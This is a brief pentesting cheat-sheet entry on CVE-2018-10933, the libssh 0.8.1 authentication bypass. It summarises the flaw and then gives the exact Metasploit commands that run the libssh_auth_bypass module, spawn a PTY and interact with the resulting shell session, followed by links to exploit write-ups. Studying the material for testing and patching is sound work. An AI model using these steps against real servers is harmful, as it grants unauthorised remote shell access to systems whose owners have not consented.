libssh 0.8.1 - CVE 2018-10933

Theory

Description

In late 2018, a critical vulnerability was uncovered in the libssh server code. A vulnerability within the server code can enable a client to bypass the authentication process and set the internal state machine maintained by the library to authenticate, enabling the (otherwise prohibited) creation of channels.

Read More: https://www.libssh.org/security/advisories/CVE-2018-10933.txt

Practical

Metasploit

msfconsole -q

use auxiliary/scanner/ssh/libssh_auth_bypass

set RHOSTS <IP>

set RPORT <ssh port>

set SPAWN_PTY true

run

# Interact with the session

sessions

sessions -i <session number>

FOR FURTHER READING

• https://blog.pentesteracademy.com/libssh-authentication-bypass-abd8fff5b3db

• https://www.exploit-db.com/exploits/45638

• https://ine.com/blog/libssh-auth-bypass-cve-2018-10933

• https://gist.github.com/mgeeky/a7271536b1d815acfb8060fd8b65bd5d